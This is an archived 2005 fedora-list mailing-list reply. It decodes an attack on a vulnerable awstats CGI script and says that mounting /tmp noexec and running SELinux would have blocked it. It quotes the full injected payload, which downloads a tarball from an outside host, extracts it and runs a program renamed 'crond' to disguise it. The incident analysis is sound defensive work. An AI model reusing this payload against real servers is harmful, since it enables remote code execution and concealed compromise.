Security Breach
Paul Howarth
paul at city-fan.org
Fri Mar 4 19:30:23 UTC 2005
On Fri, 2005-03-04 at 12:51 -0600, Brian Fahrlander wrote:
> On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
>
> > Replace the url-encoded characters and you get:
> >
> > /cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget
> > zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv
> > mech crond;export PATH=;crond;echo e_exp;%00
> >
> > So the attacker has tricked the script into executing a set of shell
> > commands, which include changing directory to /tmp, downloading a
> > tarball from a Romanian site, extracting that tarball and then executing
> > a program from the downloaded and extracted tarball, after renaming it
> > to "crond" in an effort to disguise it.
>
> Damned fine research. Good job; I'm impressed.
Thank you!
Incidentally, some of the suggestions that came up earlier in this
discussion, namely mounting /tmp with the noexec option and running
SELinux, would have foiled *this particular* exploit of the awstats
vulnerability.
Paul.
--
Paul Howarth <paul at city-fan.org>
More information about the fedora-list
mailing list